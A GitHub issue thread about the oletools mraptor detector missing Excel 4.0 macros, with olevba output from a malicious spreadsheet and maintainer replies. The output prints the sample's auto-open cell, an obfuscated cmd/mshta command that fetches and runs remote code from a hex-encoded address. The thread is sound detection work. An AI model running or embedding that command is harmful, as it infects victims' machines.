mraptor does not detect Excel4 Macro

[gnugnug]

olevba detects a suspicious macro with autoexec:

$ olevba Mail_56520.xls
olevba 0.60 on Python 3.6.8 - http:https://decalage.info/python/oletools
===============================================================================
FILE: Mail_56520.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - SS
' 0085     17 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Time Car
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d SS!S1
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' SS,S15,EXEC("cmd /c m^s^h^t^a h^t^tp:/^/0^x5^bf^07^6a^8/se/s.html"),""
' SS,S23,HALT(),""
' Time Car,C16,"",39082.00000000000000000000
' Time Car,C21,"IF(C16=0,"",C16-6)",""
' Time Car,H21,[],""
' Time Car,C22,"IF(C16=0,"",C16-5)",""
' Time Car,H22,[],""
' Time Car,C23,"IF(C16=0,"",C16-4)",""
' Time Car,H23,[],""
' Time Car,C24,"IF(C16=0,"",C16-3)",""
' Time Car,H24,[],""
' Time Car,C25,"IF(C16=0,"",C16-2)",""
' Time Car,H25,[],""
' Time Car,C26,"IF(C16=0,"",C16-1)",""
' Time Car,H26,[],""
' Time Car,C27,"IF(C16=0,"",C16)",""
' Time Car,H27,[],""
' Time Car,D28,R~20C~3,""
' Time Car,E28,R~20C~4,""
' Time Car,F28,R~20C~5,""
' Time Car,G28,R~20C~6,""
' Time Car,H28,R~20C~7,""
' Time Car,D30,D28*D29,""
' Time Car,E30,E28*E29,""
' Time Car,F30,F28*F29,""
' Time Car,G30,G28*G29,""
' Time Car,H30,R~29C~3,""
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Auto_Open           |Runs when the Excel Workbook is opened       |
|Suspicious|EXEC                |May run an executable file or a system       |
|          |                    |command using Excel 4 Macros (XLM/XLF)       |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+--------------------+---------------------------------------------+

However mraptor claims there is no macro:

$ mraptor Mail_56520.xls
MacroRaptor 0.56.2 - http:https://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File
----------+-----+----+--------------------------------------------------------
No Macro  |     |OLE:|Mail_56520.xls

The reason for this is that mraptor.py only checks if the file contains_vba_macros and not if it contains_xlm_macros. However I'm unsure if this is by design.
The file is attached, password 9953
Mail_56520.zip

[decalage2]

Indeed mraptor only supports VBA for now, I should change the result to "No VBA macro" instead of "No macro".

[gnugnug]

@decalage2 Yes thats what I guessed. Is there a reason why we can't simply extend the check in https://github.com/decalage2/oletools/blob/master/oletools/mraptor.py#L312 to "if vba_parser.detect_vba_macros() or vba_parser.detect_xlm_macros():"?
The next line vba_parser.get_vba_code_all_modules() seems to extract XLM macros anyway.